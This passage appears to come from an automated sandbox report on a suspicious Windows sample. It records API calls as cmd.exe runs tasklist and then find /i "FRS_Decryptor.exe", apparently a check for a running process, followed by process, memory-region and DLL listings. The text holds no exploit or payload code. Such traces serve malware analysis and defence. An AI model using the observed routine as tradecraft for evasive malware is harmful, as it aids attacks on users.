[0117.070] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0117.070] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.070] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.070] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x96f670, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x96f670) returned 0xffffffff [0117.070] GetLastError () returned 0x2 [0117.070] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.070] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x96f670, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x96f670) returned 0xc104a0 [0117.070] FindClose (in: hFindFile=0xc104a0 | out: hFindFile=0xc104a0) returned 1 [0117.070] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x96f670, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x96f670) returned 0xffffffff [0117.070] GetLastError () returned 0x2 [0117.070] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x96f670, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x96f670) returned 0xc104a0 [0117.070] FindClose (in: hFindFile=0xc104a0 | out: hFindFile=0xc104a0) returned 1 [0117.071] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0117.071] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0117.071] GetConsoleTitleW (in: lpConsoleTitle=0x96fb6c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0117.071] InitializeProcThreadAttributeList (in: lpAttributeList=0x96fa98, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x96fa7c | out: lpAttributeList=0x96fa98, lpSize=0x96fa7c) returned 1 [0117.071] UpdateProcThreadAttribute (in: lpAttributeList=0x96fa98, dwFlags=0x0, Attribute=0x60001, lpValue=0x96fa84, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x96fa98, lpPreviousValue=0x0) returned 1 [0117.071] GetStartupInfoW (in: lpStartupInfo=0x96fad0 | out: lpStartupInfo=0x96fad0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2b8, hStdError=0x2c)) [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0117.071] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0117.072] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0117.072] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0117.072] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0117.072] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0117.072] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0117.072] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0117.072] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0117.072] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0117.072] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0117.072] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0117.072] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x96fa20*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x96fa6c | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0x96fa6c*(hProcess=0x60, hThread=0x54, dwProcessId=0xbc8, dwThreadId=0xb98)) returned 1 [0117.074] CloseHandle (hObject=0x54) returned 1 [0117.074] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0117.074] GetEnvironmentStringsW () returned 0xc1ad78* [0117.075] FreeEnvironmentStringsA (penv="=") returned 1 [0117.075] DeleteProcThreadAttributeList (in: lpAttributeList=0x96fa98 | out: lpAttributeList=0x96fa98) [0117.075] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0117.075] _close (_FileHandle=4) returned 0 [0117.075] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0117.541] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x96fde0 | out: lpExitCode=0x96fde0*=0x0) returned 1 [0117.541] CloseHandle (hObject=0x64) returned 1 [0117.541] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0117.542] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x96fde0 | out: lpExitCode=0x96fde0*=0x0) returned 1 [0117.543] CloseHandle (hObject=0x60) returned 1 [0117.543] _get_osfhandle (_FileHandle=1) returned 0x2b8 [0117.543] SetConsoleMode (hConsoleHandle=0x2b8, dwMode=0x0) returned 0 [0117.543] _get_osfhandle (_FileHandle=1) returned 0x2b8 [0117.543] GetConsoleMode (in: hConsoleHandle=0x2b8, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0117.543] _get_osfhandle (_FileHandle=0) returned 0x24 [0117.543] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0117.543] SetConsoleInputExeNameW () returned 0x1 [0117.543] GetConsoleOutputCP () returned 0x1b5 [0117.543] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0117.543] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.543] exit (_Code=0) Process: id = "119" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x619e7000" os_pid = "0xb84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "118" os_parent_pid = "0xb8c" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6071 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 6072 start_va = 0x250000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 6073 start_va = 0x270000 end_va = 0x271fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 6074 start_va = 0x280000 end_va = 0x28efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 6075 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 6076 start_va = 0x2d0000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 6077 start_va = 0x310000 end_va = 0x313fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 6078 start_va = 0x320000 end_va = 0x320fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 6079 start_va = 0x330000 end_va = 0x331fff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 6080 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6081 start_va = 0x7f6c0000 end_va = 0x7f6e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6c0000" filename = "" Region: id = 6082 start_va = 0x7f6e4000 end_va = 0x7f6e4fff entry_point = 0x0 region_type = private name = "private_0x000000007f6e4000" filename = "" Region: id = 6083 start_va = 0x7f6ec000 end_va = 0x7f6eefff entry_point = 0x0 region_type = private name = "private_0x000000007f6ec000" filename = "" Region: id = 6084 start_va = 0x7f6ef000 end_va = 0x7f6effff entry_point = 0x0 region_type = private name = "private_0x000000007f6ef000" filename = "" Region: id = 6085 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6086 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6087 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6088 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 6108 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 6109 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6110 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6111 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6116 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 6117 start_va = 0x260000 end_va = 0x263fff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 6118 start_va = 0x270000 end_va = 0x272fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 6119 start_va = 0x340000 end_va = 0x3bdfff entry_point = 0x340000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6120 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 6121 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 6122 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 6123 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 6124 start_va = 0x400000 end_va = 0x400fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6125 start_va = 0x410000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 6126 start_va = 0x420000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 6127 start_va = 0x460000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6128 start_va = 0x610000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6129 start_va = 0x710000 end_va = 0x897fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 6130 start_va = 0x8e0000 end_va = 0x8effff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 6131 start_va = 0x8f0000 end_va = 0xa70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 6132 start_va = 0xa80000 end_va = 0x1e7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 6133 start_va = 0x1e80000 end_va = 0x1fc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6134 start_va = 0x1fd0000 end_va = 0x22a4fff entry_point = 0x1fd0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6135 start_va = 0x22b0000 end_va = 0x26abfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022b0000" filename = "" Region: id = 6136 start_va = 0x73430000 end_va = 0x73471fff entry_point = 0x73430000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 6137 start_va = 0x73480000 end_va = 0x734e0fff entry_point = 0x73480000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 6138 start_va = 0x734f0000 end_va = 0x734fbfff entry_point = 0x734f0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 6139 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 6140 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 6141 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 6142 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 6143 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 6144 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 6145 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 6146 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 6147 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 6148 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 6149 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 6150 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 6151 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6152 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6153 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6154 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6155 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6156 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6157 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 6158 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6159 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 6160 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6161 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 6162 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6163 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 6164 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6165 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6166 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 6167 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 6168 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6169 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6170 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6171 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6172 start_va = 0x7f5c0000 end_va = 0x7f6bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f5c0000" filename = "" Region: id = 6173 start_va = 0x7f6e9000 end_va = 0x7f6ebfff entry_point = 0x0 region_type = private name = "private_0x000000007f6e9000" filename = "" Thread: id = 327 os_tid = 0xbc4 Thread: id = 329 os_tid = 0xbc0 Thread: id = 330 os_tid = 0xb9c Thread: id = 331 os_tid = 0xba0 Process: id = "120" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x6bdb6000" os_pid = "0xbc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "118" os_parent_pid = "0xb8c" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6090 start_va = 0x7a0000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 6091 start_va = 0x7c0000 end_va = 0x7c1fff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 6092 start_va = 0x7d0000 end_va = 0x7defff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 6093 start_va = 0x7e0000 end_va = 0x81ffff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 6094 start_va = 0x820000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 6095 start_va = 0x860000 end_va = 0x863fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 6096 start_va = 0x870000 end_va = 0x870fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 6097 start_va = 0x880000 end_va = 0x881fff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 6098 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 6099 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6100 